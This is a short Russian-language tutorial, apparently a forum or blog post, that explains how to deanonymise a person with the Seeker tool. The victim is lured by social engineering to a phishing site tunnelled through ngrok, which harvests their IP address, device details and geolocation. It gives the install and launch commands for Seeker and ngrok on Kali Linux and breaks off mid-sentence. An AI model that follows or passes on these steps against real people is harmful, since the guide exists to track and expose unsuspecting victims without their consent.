Для деанонимизации достаточно использовать утилиту Seeker (местоположение, IP, OS, количество ядер процессора, CPU, GPU. браузер). Что это такое и с чем ее едят? Об этом ниже.
Как это работает? Запускаем фишинговый сайт, скидываем его жертве, с помощью СИ заставляем перейти. Он переходит, мы получаем IP и т.д. Если даёт доступ к геолокации, то получаем точное месторасположение. Нам нужно Сам seeker + ngrok. Атаку произведем с Kali Linux. Установка Seeker: sudo apt update sudo apt install python3 python3-pip php ssh git pip3 install requests git clone https://github.com/thewhiteh4t/seeker cd seeker/ python3 ./seeker.py -h Установка Ngrok: wget `curl -s https://ngrok.com/download | grep -o -E 'https://bin.equinox.io/c/[A-Za-z0-9]{4,}/ngrok-stable-linux-amd64.zip'` unzip ngrok-stable-linux-amd64.zip chmod +x ./ngrok ./ngrok -h Seeker Запускаем seeker: python3 ./seeker.py -t manual Если при попытке запуска встроенного PHP сервера у вас возникли проблемы, то посмотрите содержимое файла ./l